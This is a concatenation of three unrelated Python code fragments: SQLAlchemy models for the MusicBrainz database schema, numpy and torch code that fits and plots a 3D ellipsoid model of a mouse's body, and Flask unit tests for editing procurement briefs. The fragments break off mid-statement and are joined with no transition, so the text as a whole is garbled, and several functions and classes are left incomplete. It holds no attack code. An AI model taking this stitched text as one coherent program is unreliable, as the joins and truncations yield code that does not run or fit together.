medium = relationship('Medium', foreign_keys=[medium_id], innerjoin=True, backref=backref('tracks', order_by="Track.position"))
artist_credit = relationship('ArtistCredit', foreign_keys=[artist_credit_id], innerjoin=True)
class TrackGIDRedirect(Base):
__tablename__ = 'track_gid_redirect'
__table_args__ = (
Index('track_gid_redirect_idx_new_id', 'new_id'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
gid = Column(UUID, primary_key=True, nullable=False)
redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('track.id', 'musicbrainz'), name='track_gid_redirect_fk_new_id'), nullable=False)
created = Column(DateTime(timezone=True), server_default=sql.func.now())
redirect = relationship('Track', foreign_keys=[redirect_id], innerjoin=True)
@hybrid_property
def new_id(self):
return self.redirect_id
@hybrid_property
def track(self):
return self.redirect
class TrackRaw(Base):
__tablename__ = 'track_raw'
__table_args__ = (
Index('track_raw_idx_release', 'release'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
release_id = Column('release', Integer, ForeignKey(apply_schema('release_raw.id', 'musicbrainz'), name='track_raw_fk_release'), nullable=False)
title = Column(String(255), nullable=False)
artist = Column(String(255))
sequence = Column(Integer, nullable=False)
release = relationship('ReleaseRaw', foreign_keys=[release_id], innerjoin=True)
class MediumIndex(Base):
__tablename__ = 'medium_index'
__table_args__ = (
Index('medium_index_idx', 'toc'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
medium_id = Column('medium', Integer, ForeignKey(apply_schema('medium.id', 'musicbrainz'), name='medium_index_fk_medium', ondelete='CASCADE'), primary_key=True)
toc = Column(Cube)
medium = relationship('Medium', foreign_keys=[medium_id])
class URL(Base):
__tablename__ = 'url'
__table_args__ = (
Index('url_idx_gid', 'gid', unique=True),
Index('url_idx_url', 'url', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
gid = Column(UUID, nullable=False)
url = Column(String, nullable=False)
edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
class URLGIDRedirect(Base):
__tablename__ = 'url_gid_redirect'
__table_args__ = (
Index('url_gid_redirect_idx_new_id', 'new_id'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
gid = Column(UUID, primary_key=True, nullable=False)
redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('url.id', 'musicbrainz'), name='url_gid_redirect_fk_new_id'), nullable=False)
created = Column(DateTime(timezone=True), server_default=sql.func.now())
redirect = relationship('URL', foreign_keys=[redirect_id], innerjoin=True)
@hybrid_property
def new_id(self):
return self.redirect_id
@hybrid_property
def url(self):
return self.redirect
class Vote(Base):
__tablename__ = 'vote'
__table_args__ = (
Index('vote_idx_edit', 'edit'),
Index('vote_idx_editor_vote_time', 'editor', 'vote_time'),
Index('vote_idx_editor_edit', 'editor', 'edit'),
Index('vote_idx_vote_time', 'vote_time'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='vote_fk_editor'), nullable=False)
edit_id = Column('edit', Integer, ForeignKey(apply_schema('edit.id', 'musicbrainz'), name='vote_fk_edit'), nullable=False)
vote = Column(SMALLINT, nullable=False)
vote_time = Column(DateTime(timezone=True), server_default=sql.func.now())
superseded = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
edit = relationship('Edit', foreign_keys=[edit_id], innerjoin=True)
class Work(Base):
__tablename__ = 'work'
__table_args__ = (
Index('work_idx_gid', 'gid', unique=True),
Index('work_idx_name', 'name'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
gid = Column(UUID, nullable=False)
name = Column(String, nullable=False)
type_id = Column('type', Integer, ForeignKey(apply_schema('work_type.id', 'musicbrainz'), name='work_fk_type'))
comment = Column(String(255), default='', server_default=sql.text("''"), nullable=False)
edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
type = relationship('WorkType', foreign_keys=[type_id])
class WorkLanguage(Base):
__tablename__ = 'work_language'
__table_args__ = (
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_language_fk_work'), primary_key=True, nullable=False)
language_id = Column('language', Integer, ForeignKey(apply_schema('language.id', 'musicbrainz'), name='work_language_fk_language'), primary_key=True, nullable=False)
edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
created = Column(DateTime(timezone=True), server_default=sql.func.now())
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
language = relationship('Language', foreign_keys=[language_id], innerjoin=True)
class WorkRatingRaw(Base):
__tablename__ = 'work_rating_raw'
__table_args__ = (
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_rating_raw_fk_work'), primary_key=True, nullable=False)
editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='work_rating_raw_fk_editor'), primary_key=True, nullable=False)
rating = Column(SMALLINT, nullable=False)
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
class WorkTagRaw(Base):
__tablename__ = 'work_tag_raw'
__table_args__ = (
Index('work_tag_raw_idx_tag', 'tag'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_tag_raw_fk_work'), primary_key=True, nullable=False)
editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='work_tag_raw_fk_editor'), primary_key=True, nullable=False)
tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='work_tag_raw_fk_tag'), primary_key=True, nullable=False)
is_upvote = Column(Boolean, default=True, server_default=sql.true(), nullable=False)
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class WorkAliasType(Base):
__tablename__ = 'work_alias_type'
__table_args__ = (
Index('work_alias_type_idx_gid', 'gid', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_alias_type.id', 'musicbrainz'), name='work_alias_type_fk_parent'))
child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
description = Column(String)
gid = Column(UUID, nullable=False)
parent = relationship('WorkAliasType', foreign_keys=[parent_id])
class WorkAlias(Base):
__tablename__ = 'work_alias'
__table_args__ = (
Index('work_alias_idx_work', 'work'),
Index('work_alias_idx_primary', 'work', 'locale', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_alias_fk_work'), nullable=False)
name = Column(String, nullable=False)
locale = Column(String)
edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
type_id = Column('type', Integer, ForeignKey(apply_schema('work_alias_type.id', 'musicbrainz'), name='work_alias_fk_type'))
sort_name = Column(String, nullable=False)
begin_date_year = Column(SMALLINT)
begin_date_month = Column(SMALLINT)
begin_date_day = Column(SMALLINT)
end_date_year = Column(SMALLINT)
end_date_month = Column(SMALLINT)
end_date_day = Column(SMALLINT)
primary_for_locale = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
ended = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
type = relationship('WorkAliasType', foreign_keys=[type_id])
begin_date = composite(PartialDate, begin_date_year, begin_date_month, begin_date_day)
end_date = composite(PartialDate, end_date_year, end_date_month, end_date_day)
class WorkAnnotation(Base):
__tablename__ = 'work_annotation'
__table_args__ = (
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_annotation_fk_work'), primary_key=True, nullable=False)
annotation_id = Column('annotation', Integer, ForeignKey(apply_schema('annotation.id', 'musicbrainz'), name='work_annotation_fk_annotation'), primary_key=True, nullable=False)
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
annotation = relationship('Annotation', foreign_keys=[annotation_id], innerjoin=True)
class WorkGIDRedirect(Base):
__tablename__ = 'work_gid_redirect'
__table_args__ = (
Index('work_gid_redirect_idx_new_id', 'new_id'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
gid = Column(UUID, primary_key=True, nullable=False)
redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_gid_redirect_fk_new_id'), nullable=False)
created = Column(DateTime(timezone=True), server_default=sql.func.now())
redirect = relationship('Work', foreign_keys=[redirect_id], innerjoin=True)
@hybrid_property
def new_id(self):
return self.redirect_id
@hybrid_property
def work(self):
return self.redirect
class WorkMeta(Base):
__tablename__ = 'work_meta'
__table_args__ = (
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column('id', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_meta_fk_id', ondelete='CASCADE'), primary_key=True, nullable=False)
rating = Column(SMALLINT)
rating_count = Column(Integer)
work = relationship('Work', foreign_keys=[id], innerjoin=True, backref=backref('meta', uselist=False))
class WorkTag(Base):
__tablename__ = 'work_tag'
__table_args__ = (
Index('work_tag_idx_tag', 'tag'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_tag_fk_work'), primary_key=True, nullable=False)
tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='work_tag_fk_tag'), primary_key=True, nullable=False)
count = Column(Integer, nullable=False)
last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class WorkType(Base):
__tablename__ = 'work_type'
__table_args__ = (
Index('work_type_idx_gid', 'gid', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
name = Column(String(255), nullable=False)
parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_type.id', 'musicbrainz'), name='work_type_fk_parent'))
child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
description = Column(String)
gid = Column(UUID, nullable=False)
parent = relationship('WorkType', foreign_keys=[parent_id])
class WorkAttributeType(Base):
__tablename__ = 'work_attribute_type'
__table_args__ = (
Index('work_attribute_type_idx_gid', 'gid', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
name = Column(String(255), nullable=False)
comment = Column(String(255), default='', server_default=sql.text("''"), nullable=False)
free_text = Column(Boolean, nullable=False)
parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_type_fk_parent'))
child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
description = Column(String)
gid = Column(UUID, nullable=False)
parent = relationship('WorkAttributeType', foreign_keys=[parent_id])
class WorkAttributeTypeAllowedValue(Base):
__tablename__ = 'work_attribute_type_allowed_value'
__table_args__ = (
Index('work_attribute_type_allowed_value_idx_name', 'work_attribute_type'),
Index('work_attribute_type_allowed_value_idx_gid', 'gid', unique=True),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
work_attribute_type_id = Column('work_attribute_type', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_type_allowed_value_fk_work_attribute_type'), nullable=False)
value = Column(String)
parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_attribute_type_allowed_value.id', 'musicbrainz'), name='work_attribute_type_allowed_value_fk_parent'))
child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
description = Column(String)
gid = Column(UUID, nullable=False)
work_attribute_type = relationship('WorkAttributeType', foreign_keys=[work_attribute_type_id], innerjoin=True)
parent = relationship('WorkAttributeTypeAllowedValue', foreign_keys=[parent_id])
class WorkAttribute(Base):
__tablename__ = 'work_attribute'
__table_args__ = (
Index('work_attribute_idx_work', 'work'),
{'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
)
id = Column(Integer, primary_key=True)
work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_attribute_fk_work'), nullable=False)
work_attribute_type_id = Column('work_attribute_type', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_fk_work_attribute_type'), nullable=False)
work_attribute_type_allowed_value_id = Column('work_attribute_type_allowed_value', Integer, ForeignKey(apply_schema('work_attribute_type_allowed_value.id', 'musicbrainz'), name='work_attribute_fk_work_attribute_type_allowed_value'))
work_attribute_text = Column(String)
work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
work_attribute_type = relationship('WorkAttributeType', foreign_keys=[work_attribute_type_id], innerjoin=True)
work_attribute_type_allowed_value = relationship('WorkAttributeTypeAllowedValue', foreign_keys=[work_attribute_type_allowed_value_id])
class ArtType(Base):
__tablename__ = 'art_type'
__table_args__ = (
Index('art_type_idx_gid', 'gid', unique=True),
{'schema': mbdata.config.schemas.get('cover_art_archive', 'cover_art_archive')}
)
id = Column(Integer, primary_key=True, nullable=False)
name = Column(String, nullable=False)
parent_id = Column('parent', Integer, ForeignKey(apply_schema('art_type.id', u'cover_art_archive'), name='art_type_fk_parent'))
child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
description = Column(String)
gid = Column(UUID, nullable=False)
parent = relationship('ArtType', foreign_keys=[parent_id])
class ImageType(Base):
| |
= False):
h_C, h_C_new, h_r, h_lamb, h_part,h_step = history[:]
plt.figure()
iters = np.arange(len(h_C))
plt.subplot(6,1,1)
plt.plot(iters,np.log(h_C),':')
#plt.plot(iters,np.log(h_C_new),'o:')
step_logic = np.asarray(h_step) == 1
plt.plot(iters[step_logic],np.log(h_C_new)[step_logic],'og')
plt.plot(iters[~step_logic],np.log(h_C_new)[~step_logic],'or')
plt.legend(("Loss","proposed Loss"))
plt.ylim([None,np.max(np.log(h_C)) + np.std(np.log(h_C))])
plt.ylabel('$\log Loss$')
plt.subplot(6,1,2)
plt.plot(iters,np.log(h_lamb),'o:')
plt.ylabel('$\log\lambda$')
plt.subplot(6,1,3)
plt.plot(np.multiply(h_r,1e3),':o')
plt.ylabel("median residual [mm]")
plt.plot(np.diff(np.multiply(h_r,1e3)),':o')
plt.legend(("absolute","difference"))
# conver the part list to a matrix_diag
part_history = np.asarray(h_part).squeeze(1)
if second:
part_history = part_history[:,10:]
part_history.shape
plt.subplot(6,1,4)
plt.ylabel("xyz history")
plt.plot(part_history[:,[7,8,9]],'o:')
plt.subplot(6,1,5)
plt.ylabel("spine history")
angle_history = part_history[:,[3]]
plt.plot(angle_history,':o')
plt.subplot(6,1,6)
plt.ylabel("angle history")
angle_history = part_history[:,[0,1,2,4,5,6]]
plt.plot(angle_history,':o')
for i in range(6):
plt.subplot(6,1,i+1)
plt.xlim((0,len(h_C)))
plt.show()
# @njit
def rotate_body_model(alpha_body,beta_body,gamma_body):
"""
Returns R_body, to rotate and transform the mouse body model
alpha,beta,gamma is rotation around x,y,z axis respectively
https://en.wikipedia.org/wiki/Rotation_matrix#Basic_rotations
"""
R_alpha = np.empty((3,3))
R_alpha[0,:] = [1.,0.,0.]
R_alpha[1,:] = [0.,np.cos(alpha_body),-np.sin(alpha_body)]
R_alpha[2,:] = [0.,np.sin(alpha_body),np.cos(alpha_body)]
R_beta = np.empty((3,3))
R_beta[0,:] = [np.cos(beta_body),0.,np.sin(beta_body)]
R_beta[1,:] = [0.,1.,0.]
R_beta[2,:] = [-np.sin(beta_body),0.,np.cos(beta_body)]
R_gamma = np.empty((3,3))
R_gamma[0,:] = [np.cos(gamma_body),-np.sin(gamma_body),0.]
R_gamma[1,:] = [np.sin(gamma_body),np.cos(gamma_body),0.]
R_gamma[2,:] = [0.,0.,1.]
return R_alpha@R_beta@R_gamma
def torch_mouse_body_geometry(part,body_constants):
"""
This function calculates the configuration of the mouse body
In this configureation, it has four free parameters: azimuth and elevation of the nose/hip
Returns the points, which define the model: center-points and radii
theta el is elevation of the head (in xz plane)
phi lr is head rotation in xy plane
beta,gamma,s is hip pitch,yaw and spine scaling
theta,phi is nose pitch,yaw (i.e. around y and z, respectively since major body is along x axis)
"""
# get the constants for the body model
# a_hip_0,a_hip_delta,b_hip_0,b_hip_delta,d_hip,a_nose,b_nose,d_nose = mouse_body_size_constants()
body_scale,a_hip_min,a_hip_max,b_hip_min,b_hip_max,a_nose,b_nose,d_nose,x_impl,z_impl,r_impl = body_constants
alpha = part[0]
beta = part[1]
gamma = part[2]
s = part[3]
#todo naming here is off
psi = part[4]
theta = part[5]
phi = part[6]
t_body = part[7:10]
a_hip_0 = body_scale*a_hip_min
a_hip_delta = body_scale*(a_hip_max - a_hip_min)
b_hip_0 = body_scale*b_hip_min
b_hip_delta = body_scale*(b_hip_max - b_hip_min)
# calculate the spine
a_hip = a_hip_0 + s * a_hip_delta
b_hip = b_hip_0 + (1-s)**1 * b_hip_delta
# scale the hip position
d_hip = .75*a_hip # tried this, no good
# d_hip = a_hip - a_nose
R_body = rotate_body_model(alpha,beta,gamma)
R_head = rotate_body_model(psi,theta,phi)
R_nose = R_body @ R_head
# use einsum to multiply Q with R.T, to get R @ Q @ R.T
#Q_hip = R_body @ torch.einsum('aij,akj->aik', [make_inner_Q(a_hip,b_hip,n_particles),R_body])
# and the Q matrices
Q_inner =np.zeros((3,3))
Q_inner[[0,1,2],[0,1,2]] = np.asanyarray([1/a_hip**2,1/b_hip**2,1/b_hip**2]).ravel()
Q_hip = R_body @ Q_inner @ R_body.T
Q_inner[[0,1,2],[0,1,2]] = np.asanyarray([1/a_nose**2,1/b_nose**2,1/b_nose**2]).ravel()
Q_nose = R_nose @ np.diag(np.array([1/a_nose**2,1/b_nose**2,1/b_nose**2])) @ R_nose.T
# And now we get the spine coordinates
c_hip = np.array([0,0,0])
c_mid = np.array([d_hip,0,0])
c_nose = c_mid + R_head @ np.array([d_nose,0,0])
c_impl = c_mid + R_head @ np.array([x_impl,0,z_impl])
# Now, calculate the distance vectors from the origin of the hip, mid and head, in the real world
c_hip = c_hip + t_body
c_nose = R_body @ c_nose + t_body
c_impl = R_body @ c_impl + t_body
# now, just return the coordinates and the radii
return R_body,R_nose,c_mid,c_hip,c_nose,c_impl,a_hip,b_hip,a_nose,b_nose,Q_hip,Q_nose
def add_torch_mouse_for_video(ax,part,body_constants,color = 'r',plot_alpha = .7, implant=False):
# this also need a vector
# get the geometry of the mouse body # not really the preferred way
body_scale,a_hip_min,a_hip_max,b_hip_min,b_hip_max,a_nose,b_nose,d_nose,x_impl,z_impl,r_impl = body_constants
R_body,R_nose,c_mid,c_hip,c_nose,c_impl,a_hip,b_hip,a_nose,b_nose,Q_hip,Q_nose = torch_mouse_body_geometry(part,body_constants)
alpha = part[0]
beta = part[1]
gamma = part[2]
s = part[3]
#todo naming here is off
psi = part[4]
theta = part[5]
phi = part[6]
t_body = part[7:10]
# print("plotting thinks that c_nose is {}".format(c_nose))
# print("plotting thinks that c_mid is {}".format(c_mid))
h_hip,h_nose,h_impl = None,None,None
# We have to plot two ellipses
# FIRST PLOT THE ELLIPSE, which is the hip
# generate points on a sphere
u, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:10j]
# get the mesh, by using the equation of an ellipsoid
x=np.cos(u)*a_hip
y=np.sin(u)*np.sin(v)*b_hip
z=np.sin(u)*np.cos(v)*b_hip
# pack to matrix of positions
posi = np.vstack((x.ravel(),y.ravel(),z.ravel()))
# apply the rotatation and unpack
# posi_rotated = ((R_body @ (posi.T + c_hip).T ).T + t_body).T
posi_rotated = (R_body @ posi + c_hip[:,np.newaxis])
# posi_rotated = ((R_body @ (posi.T + c_hip).T ).T + t_body).T
x = posi_rotated[0,:]
y = posi_rotated[1,:]
z = posi_rotated[2,:]
# reshape for wireframe
x = np.reshape(x, (u.shape) )
y = np.reshape(y, (u.shape) )
z = np.reshape(z, (u.shape) )
h_hip = ax.plot_wireframe(x, y, z, color=color,alpha = plot_alpha)
# THEN PLOT THE ELLIPSE, which is the nose
u, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:10j]
x=np.cos(u)*a_nose
y=np.sin(u)*np.sin(v)*b_nose
z=np.sin(u)*np.cos(v)*b_nose
posi = np.vstack((x.ravel(),y.ravel(),z.ravel()))
# kind of old, but w/e
# R_head = rotate_body_model(psi,theta,phi)
# posi_rotated = ((R_body @ ( (R_head @ posi).T + c_nose).T ).T + t_body).T
# posi_rotated = R_body @ ((R_head @ (posi.T + c_nose).T ).T + t_body).T
# posi_rotated = ((R_nose @ (posi.T ).T ).T + t_body)
posi_rotated = (R_nose @ posi + c_nose[:,np.newaxis])
x = posi_rotated[0,:]
y = posi_rotated[1,:]
z = posi_rotated[2,:]
x = np.reshape(x, (u.shape) )
y = np.reshape(y, (u.shape) )
z = np.reshape(z, (u.shape) )
# h_nose = ax.plot_wireframe(x, y, z, color=color,alpha = 0.7)
h_nose = ax.plot_wireframe(x, y, z, color='green',alpha = plot_alpha)
if implant:
# THEN PLOT THE ELLIPSE, which is the nose
u, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:10j]
x=np.cos(u)*r_impl
y=np.sin(u)*np.sin(v) * r_impl
z=np.sin(u)*np.cos(v) *r_impl
posi = np.vstack((x.ravel(),y.ravel(),z.ravel()))
posi_rotated = (R_nose @ posi + c_impl[:,np.newaxis])
# kind of old, but w/e
# posi_rotated = ((R_body @ ( (R_head @ posi).T + c_impl).T ).T + t_body).T
# posi_rotated = ((R_nose @ (posi.T + c_nose).T ).T + t_body).T
x = posi_rotated[0,:]
y = posi_rotated[1,:]
z = posi_rotated[2,:]
x = np.reshape(x, (u.shape) )
y = np.reshape(y, (u.shape) )
z = np.reshape(z, (u.shape) )
# h_nose = ax.plot_wireframe(x, y, z, color=color,alpha = 0.7)
h_impl = ax.plot_wireframe(x, y, z, color='blue',alpha = plot_alpha)
#%%
def close_4d(ax,positions):
"""
The positions keyword is a bit silly, but this is just used to estimate
the min and max of the axes, so that all are visible
"""
# ax.set_aspect('equal')
X,Y,Z = positions[:,0], positions[:,1], positions[:,2]
max_range = np.array([X.max()-X.min(), Y.max()-Y.min(), Z.max()-Z.min()]).max() / 2.0
mid_x = (X.max()+X.min()) * 0.5
mid_y = (Y.max()+Y.min()) * 0.5
mid_z = (Z.max()+Z.min()) * 0.5
max_range = .3
mid_x = 0.
mid_y = 0.
mid_z = 0.
ax.set_xlim(-.3,.3)
ax.set_ylim(-.3,.3)
ax.set_zlim(0,.6)
ax.set_xlabel('x (mm)',fontsize=16)
ax.set_ylabel('y (mm)',fontsize=16)
zlabel = ax.set_zlabel('z (mm)',fontsize=16)
def plot_particles(ax,particles,positions,body_constants,alpha = 0.1,keyp = None,ikeyp = None,body_supports=None,single = False):
if len(particles.shape) == 1:
particles = np.tile(particles,(1,1))
if single:
particles = particles[:,:10]
# print(particles.shape)
n_particles = particles.shape[0]
# plot the particle mice!
# adjust the bottom!
scat = ax.scatter(positions[:,0],positions[:,1],positions[:,2],c='k',alpha=.2,marker='o',s=6)
for i in range(n_particles):
x_fit = particles[i,:]
add_torch_mouse_for_video(ax,x_fit,body_constants,color = 'r',plot_alpha = alpha,implant=True)
if len(x_fit) > 10:
x_fit = x_fit[10:]
add_torch_mouse_for_video(ax,x_fit,body_constants,color = 'r',plot_alpha = alpha,implant=False)
# close_4d(ax,positions)
fz = 10
# ax.set_xlabel('x (mm)',fontsize=6)
# ax.set_ylabel('y (mm)',fontsize=6)
# zlabel = ax.set_zlabel('z (mm)',fontsize=6)
if keyp is not None:
body_colors = ['dodgerblue','red','lime','orange']
for i,body in enumerate(ikeyp.numpy()):
ax.scatter(keyp[i,0], keyp[i,1], keyp[i,2], zdir='z', s=100, c=body_colors[int(body)],rasterized=True)
if body_supports is not None:
for pp in body_supports[0][:]:
pp = pp[0,:,0].numpy()
ax.scatter(pp[0], pp[1], pp[2], zdir='z', s=100, c='k',rasterized=True)
c_hip,c_ass,c_mid,c_nose,c_tip,c_impl = body_supports[0]
ax.plot([c_mid[0,0,0],c_ass[0,0,0]],[c_mid[0,1,0],c_ass[0,1,0]],[c_mid[0,2,0],c_ass[0,2,0]],c='k')
ax.plot([c_mid[0,0,0],c_nose[0,0,0]],[c_mid[0,1,0],c_nose[0,1,0]],[c_mid[0,2,0],c_nose[0,2,0]],c='k')
ax.plot([c_mid[0,0,0],c_tip[0,0,0]],[c_mid[0,1,0],c_tip[0,1,0]],[c_mid[0,2,0],c_tip[0,2,0]],c='k')
ax.plot([c_impl[0,0,0],c_nose[0,0,0]],[c_impl[0,1,0],c_nose[0,1,0]],[c_impl[0,2,0],c_nose[0,2,0]],c='k')
ax.plot([c_impl[0,0,0],c_tip[0,0,0]],[c_impl[0,1,0],c_tip[0,1,0]],[c_impl[0,2,0],c_tip[0,2,0]],c='k')
for pp in body_supports[1][:5]:
pp = pp[0,:,0].numpy()
ax.scatter(pp[0], pp[1], pp[2], zdir='z', s=100, c='k',rasterized=True)
c_hip,c_ass,c_mid,c_nose,c_tip,c_impl = body_supports[1]
ax.plot([c_mid[0,0,0],c_ass[0,0,0]],[c_mid[0,1,0],c_ass[0,1,0]],[c_mid[0,2,0],c_ass[0,2,0]],c='k')
ax.plot([c_mid[0,0,0],c_nose[0,0,0]],[c_mid[0,1,0],c_nose[0,1,0]],[c_mid[0,2,0],c_nose[0,2,0]],c='k')
ax.plot([c_mid[0,0,0],c_tip[0,0,0]],[c_mid[0,1,0],c_tip[0,1,0]],[c_mid[0,2,0],c_tip[0,2,0]],c='k')
ax.xaxis.label.set_size(fz)
ax.yaxis.label.set_size(fz)
ax.zaxis.label.set_size(fz)
def plot_fitted_mouse(positions,x0_start,best_mouse, keyp = None, ikeyp = None,body_supports=None):
# the winning mouse is the one, with the lowest final loss
#end_loss = [np.mean(ll[-1:]) for ll in ll_holder]
#best_idx = np.argmin(end_loss)
#best_mouse = best_holder[best_idx]
which_opt = 0
opt_names = ['geoLM']
# i_frame = 0
#fig,ax = open_3d()
fig = plt.figure(figsize=(15,7.5))
ax = fig.add_subplot(1, 2, 1, projection='3d')
plot_particles(ax,x0_start,positions,body_constants,alpha = .5,keyp = keyp, ikeyp = ikeyp,body_supports=body_supports)
ax.set_title("Initial clicked mouse")
ax = fig.add_subplot(1, 2, 2, projection='3d')
plot_particles(ax,best_mouse,positions,body_constants,alpha = .5,keyp = keyp, ikeyp = ikeyp,body_supports=body_supports)
ax.set_title("After fitting w. "+opt_names[which_opt])
plt.show()
class rls_bank:
def __init__(self,embedding = 9):
# try to make everything [batch x embedding], i.e. [n_vars X embedding X ...]
self.embedding = embedding
self.mu = 0.99
self.eps = 0.1
self.n_vars = 20
self.w = torch.zeros((self.n_vars,self.embedding))
# by convention (I think?) the most recent is on the left
# self.w[:,0] += 1.
single_R = 1/self.eps * torch.eye(self.embedding)
single_R = single_R.reshape((1, self.embedding, self.embedding))
self.R = single_R.repeat(self.n_vars, 1, 1)
# and make a stanck
self.Rnp = 1/self.eps * np.eye(self.embedding)
def adapt(self,d,x):
"""
Adapt weights according one desired value and its input.
**Args:**
* `d` : desired value (float)
* `x` : input array (1-dimensional array)
| |
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
content_fixture = ContentLoader('tests/fixtures/content')
content_fixture.load_manifest('dos', 'data', 'edit_brief')
content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/section-4/optional2",
data={
"optional2": True
})
assert res.status_code == 302
data_api_client.update_brief.assert_called_with(
'1234',
{"optional2": True},
page_questions=['optional2'],
updated_by='<EMAIL>'
)
assert res.headers['Location'].endswith(
'buyers/frameworks/digital-outcomes-and-specialists/requirements/digital-specialists/1234/section-4'
) is True
@mock.patch("app.buyers.views.buyers.content_loader")
def test_post_update_if_single_question_no_description_redirects_to_overview(self, content_loader, data_api_client):
self.login_as_buyer()
data_api_client.get_framework.return_value = api_stubs.framework(
slug='digital-outcomes-and-specialists',
status='live',
lots=[
api_stubs.lot(slug='digital-specialists', allows_brief=True),
]
)
data_api_client.get_brief.return_value = api_stubs.brief()
content_fixture = ContentLoader('tests/fixtures/content')
content_fixture.load_manifest('dos', 'data', 'edit_brief')
content_loader.get_manifest.return_value = content_fixture.get_manifest('dos', 'edit_brief')
res = self.client.post(
"/buyers/frameworks/digital-outcomes-and-specialists/requirements/"
"digital-specialists/1234/edit/section-2/required2",
data={
"required2": True
})
assert res.status_code == 302
data_api_client.update_brief.assert_called_with(
'1234',
{"required2": True},
page_questions=['required2'],
